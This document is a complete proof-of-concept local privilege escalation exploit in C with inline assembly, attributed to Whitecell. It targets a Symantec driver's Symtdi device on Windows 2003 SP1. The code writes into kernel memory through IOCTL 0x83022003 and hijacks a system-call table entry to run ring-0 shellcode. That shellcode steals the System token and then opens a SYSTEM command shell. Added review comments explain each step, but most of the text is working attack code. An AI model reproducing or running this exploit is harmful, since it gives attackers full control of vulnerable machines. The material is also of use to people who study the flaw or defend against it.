Symantec Local Privilege Escalation Vulnerability Exploit (arbitrary kernel-memory write through the \\.\Symtdi device, IOCTL 0x83022003)

Author:  Polymorphours
Email:   Polymorphours@whitecell.org
Homepage:http://www.whitecell.org
Date:    2007-07-14


#include <windows.h>
#include <stdio.h>

// NtAllocateVirtualMemory is resolved from ntdll.lib; no DDK headers are needed.
#pragma comment (lib, "ntdll.lib")

// Minimal native-API definitions so the file builds without the DDK headers.
typedef LONG NTSTATUS;

#define STATUS_SUCCESS  ((NTSTATUS)0x00000000L) 
#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L) // not referenced anywhere in this file

// 12-bit offset / 4-bit type pair (the layout of a PE base-relocation entry).
// Not referenced anywhere in this file; presumably a leftover from another tool.
typedef struct _IMAGE_FIXUP_ENTRY {

    WORD    offset:12;
    WORD    type:4;
} IMAGE_FIXUP_ENTRY, *PIMAGE_FIXUP_ENTRY;

// Counted (not NUL-terminated) string as used by the NT native API:
// Length and MaximumLength are byte counts, Buffer points at UTF-16 data.
// Not referenced anywhere in this file.
typedef struct _UNICODE_STRING {

 USHORT Length;
 USHORT MaximumLength;
 PWSTR Buffer;
} UNICODE_STRING, *PUNICODE_STRING;

// Native allocator, linked from ntdll.lib (see the #pragma comment(lib) above).
//   ProcessHandle  - target process; main passes (HANDLE)-1, the current-process
//                    pseudo-handle
//   BaseAddress    - IN OUT: requested base on entry, actual base on return
//   ZeroBits       - main passes 0
//   AllocationSize - IN OUT: requested size on entry, actual size on return
//   AllocationType - MEM_* flags;  Protect - PAGE_* flags
// NOTE(review): the documented prototype uses PSIZE_T for AllocationSize; on
// the 32-bit targets this file is written for that is the same width as ULONG.
extern "C"
NTSTATUS 
NTAPI
NtAllocateVirtualMemory(
 IN HANDLE ProcessHandle,
 IN OUT PVOID *BaseAddress,
 IN ULONG ZeroBits,
 IN OUT PULONG AllocationSize,
 IN ULONG AllocationType,
 IN ULONG Protect
 );

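/*
 * Entry point of the PoC.  Everything happens in this one function:
 *
 *   1. Refuse to run unless this is NT 5.2 (Windows 2003) SP1.  Every kernel
 *      address and structure offset hard-coded below was taken from one
 *      specific ntkrnlpa.exe build; on any other build they are simply a
 *      blind write into kernel memory.
 *   2. Map an RWX region at a fixed user-mode address and copy the ring-0
 *      payload (the first __asm block) into it.
 *   3. Open \\.\Symtdi and issue IOCTL 0x83022003 with the *output* buffer
 *      pointer set to a kernel address and a length of 0xC, so the 12 bytes
 *      the driver produces are written over kernel memory.
 *   4. Call ZwVdmControl.  Presumably the overwritten location is that
 *      syscall's SSDT slot (the original comments say "restore SSDT", and the
 *      payload ends with `ret 8`, matching ZwVdmControl's two arguments), so
 *      the syscall dispatches into the payload, which repairs the collateral
 *      damage and swaps this process' token for the System token.
 *   5. Spawn cmd.exe, which inherits the elevated token.
 *
 * argc/argv are unused.  Returns 0 on success and 1 when a precondition or an
 * API call fails (the original returned 0 on every path).
 */
int main(int argc, char* argv[])
{
    NTSTATUS status;
    HANDLE deviceHandle;
    DWORD dwReturnSize = 0;
    PVOID VdmControl = NULL;

    /*
     * Payload destination.  The asm below hard-codes the same value
     * (`mov edi,0x2E352E35`); keep the two in sync.  NOTE(review): the choice
     * is presumably dictated by what the driver writes (the bytes 35 2E 35 2E
     * read "5.5." in ASCII) -- not verifiable from this file.
     */
    const ULONG_PTR PayloadAddress = 0x2E352E35;
    PVOID ShellCodeMemory = (PVOID)PayloadAddress;
    DWORD MemorySize = 0x2000;

    /*
     * Kernel address the IOCTL output is written to.  The asm below hard-codes
     * the same value (`mov edi, 0x8083100C`).  0x80827D54 is the equivalent for
     * the ntoskrnl.exe build (see the comment inside the asm).
     */
    const ULONG_PTR KernelTarget = 0x8083100C;

    PROCESS_INFORMATION   pi;
    STARTUPINFOA    stStartup;
    char cmdLine[] = "cmd.exe";   /* writable: CreateProcess takes a non-const LPSTR */

    OSVERSIONINFOEX OsVersionInfo;

    RtlZeroMemory( &pi, sizeof(pi) );
    RtlZeroMemory( &OsVersionInfo, sizeof(OsVersionInfo) );
    OsVersionInfo.dwOSVersionInfoSize = sizeof(OSVERSIONINFOEX);
    if ( !GetVersionEx((OSVERSIONINFO *) &OsVersionInfo) ) {
        printf( "GetVersionEx failed, code: %lu\n", GetLastError() );
        return 1;
    }

    if ( OsVersionInfo.dwMajorVersion != 5 ) {
        printf( "Not NT5 system\n" );
        return 1;
    }

    if ( OsVersionInfo.dwMinorVersion != 2 ) {
        printf( "isn't windows 2003 system\n" );
        return 1;
    }

    /*
     * Not in the original: the banner says SP1, and the addresses below are
     * per-build, so do not fire a kernel write on SP0/SP2.
     */
    if ( OsVersionInfo.wServicePackMajor != 1 ) {
        printf( "Windows 2003 SP%u detected; hard-coded kernel addresses are for SP1 only, refusing\n",
                (unsigned)OsVersionInfo.wServicePackMajor );
        return 1;
    }

    printf( "Symantec Local Privilege Escalation Vulnerability Exploit (POC) \n\n" );
    printf( "Tested on: \n\twindows 2003 sp1 (ntkrnlpa.exe version) \n\n" );
    printf( "\tCoded by Polymorphours. Polymorphours@whitecell.org\n\n" );

    /*
     * (HANDLE)-1 is the current-process pseudo-handle.  BaseAddress and
     * AllocationSize are IN OUT: the kernel may round the base down to the
     * allocation granularity and the size up, and writes the real values back.
     */
    status = NtAllocateVirtualMemory( (HANDLE)-1,
                                      &ShellCodeMemory,
                                      0,
                                      &MemorySize,
                                      MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN,
                                      PAGE_EXECUTE_READWRITE );
    if ( status != STATUS_SUCCESS ) {
        printf( "NtAllocateVirtualMemory failed, status: %08lX\n", (unsigned long)status );
        return 1;
    }

    /*
     * Not in the original: because of the rounding above, confirm that the
     * address the asm copies to, plus the size we asked for, lies inside the
     * region we actually got -- before anything touches the kernel.
     */
    if ( (ULONG_PTR)ShellCodeMemory > PayloadAddress ||
         PayloadAddress + 0x2000 > (ULONG_PTR)ShellCodeMemory + MemorySize ) {
        printf( "payload address %p is not inside the mapped region %p+0x%lX\n",
                (PVOID)PayloadAddress, ShellCodeMemory, (unsigned long)MemorySize );
        return 1;
    }

    /* NOP-fill the whole region; the payload is copied to PayloadAddress. */
    memset( ShellCodeMemory, 0x90, MemorySize );

    __asm {

        call CopyShellCode

        nop
        nop
        nop
        nop
        nop
        nop

        //
        // Ring-0 payload: everything from the first nop up to CopyShellCode.
        // It is entered through the ZwVdmControl syscall, with that call's two
        // arguments on the stack (hence the `ret 8` at the end).
        //
        // Step 1: repair the SSDT.  The driver wrote 0xC bytes (three dwords)
        // at the target; only the first was meant to change, so put the two
        // neighbours back.  The hijacked slot itself ([edi]) is left pointing
        // at the payload (its restore is commented out, as in the original),
        // so the hook stays in place after this runs -- TODO(review).
        //
        // Values for the ntoskrnl.exe build:
        //
        //   mov edi, 0x80827D54
        //   mov [edi], 0x808C998A
        //   mov [edi+4], 0x809ba123
        //   mov [edi+8], 0x80915CBE
        //
        // Values for the ntkrnlpa.exe build (the one this PoC targets):

        mov edi, 0x8083100C
        // mov [edi], 0x808C998A
        mov [edi+4], 0x809970CC
        mov [edi+8], 0x8092FF3E

        //
        // Step 2: steal the System token.  0xFFDFF000 is the KPCR on the
        // non-/3GB layout; +0x124 holds the current thread (the original
        // comment calls it ETHREAD).  The remaining offsets are for this
        // build only; the field names below are the presumed ones.
        //
        mov eax,0xFFDFF124
        mov eax,[eax]

        mov esi,[eax+0x218]  // presumably the EPROCESS owning this thread
        mov eax,esi

    search2k3sp1:

        // Walk the process list until PID 4 (System) is found.
        // NOTE(review): there is no other exit from this loop; if no process
        // with PID 4 is ever seen this spins forever in ring 0.
        mov eax,[eax+0x98]   // presumably ActiveProcessLinks.Flink
        sub eax,0x98
        mov edx,[eax+0x94]   // presumably UniqueProcessId
        cmp edx,0x4
        jne search2k3sp1

        mov eax,[eax+0xd8]   // System's token (presumably EPROCESS.Token)
        mov [esi+0xd8],eax   // overwrite this process' token with it

        ret 8

    CopyShellCode:

        pop esi              // esi = return address = start of the payload
        lea ecx, CopyShellCode
        sub ecx, esi         // ecx = payload length in bytes

        mov edi,0x2E352E35   // destination, inside the RWX region mapped above
        cld
        rep movsb

    }

    /* Desired access 0 suffices: the IOCTL below encodes FILE_ANY_ACCESS. */
    deviceHandle = CreateFile("\\\\.\\Symtdi",
                              0,
                              FILE_SHARE_READ|FILE_SHARE_WRITE,
                              NULL,
                              OPEN_EXISTING,
                              0,
                              NULL);
    if ( INVALID_HANDLE_VALUE == deviceHandle ) {
        printf( "Open Symtdi device failed, code: %lu\n", GetLastError() );
        return 1;
    }
    printf( "Open Symtdi device success\n" );

    /*
     * The bug.  0x83022003 decodes (CTL_CODE layout) to device type 0x8302,
     * function 0x800, METHOD_NEITHER, FILE_ANY_ACCESS.  With METHOD_NEITHER the
     * driver receives the caller's raw output pointer; here that pointer is a
     * kernel address and the length is 0xC, so whatever the driver writes lands
     * in kernel memory.  NOTE(review): the driver presumably skips
     * ProbeForWrite on the output buffer -- the failure itself is not visible
     * from this file.
     */
    if ( !DeviceIoControl( deviceHandle,
                           0x83022003,
                           NULL,
                           0,
                           (PVOID)KernelTarget,
                           0xC,
                           &dwReturnSize,
                           NULL ) ) {
        /*
         * Not in the original (it ignored the result).  Deliberately do NOT
         * bail out: if the driver wrote before reporting an error, the two
         * neighbouring SSDT slots are already clobbered and the payload is the
         * only thing that repairs them; if it did not write, ZwVdmControl
         * below simply runs normally.
         */
        printf( "DeviceIoControl 0x83022003 failed, code: %lu (continuing)\n", GetLastError() );
    } else {
        printf( "DeviceIoControl 0x83022003 returned %lu bytes\n", dwReturnSize );
    }

    CloseHandle( deviceHandle );

    VdmControl = GetProcAddress( LoadLibrary("ntdll.dll"), "ZwVdmControl" );
    if ( VdmControl == NULL ) {
        printf( "VdmControl == NULL\n" );
        return 1;
    }

    printf( "call shellcode ... " );

    /* ZwVdmControl(NULL, NULL): stdcall, two arguments, callee cleans up. */
    _asm {

        xor ecx,ecx
        push ecx
        push ecx
        mov eax, VdmControl
        call eax
    }

    printf( "Done.\n" );
    printf( "Create New Process\n" );

    GetStartupInfo( &stStartup );

    /* bInheritHandles=TRUE as in the original; the child runs under this
       process' (now System) token. */
    if ( !CreateProcess( NULL,
                         cmdLine,
                         NULL,
                         NULL,
                         TRUE,
                         0,
                         NULL,
                         NULL,
                         &stStartup,
                         &pi ) ) {
        printf( "CreateProcess failed, code: %lu\n", GetLastError() );
        return 1;
    }

    /* Not in the original: drop our references; cmd.exe keeps running. */
    CloseHandle( pi.hThread );
    CloseHandle( pi.hProcess );

    return 0;
}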



WSS(Whitecell Security Systems),一个非营利性民间技术组织,致力于各种系统安全技术的研究。坚持传统的hacker精神,追求技术的精纯。
WSS 主页:http://www.whitecell.org/
WSS 论坛:http://www.whitecell.org/forums/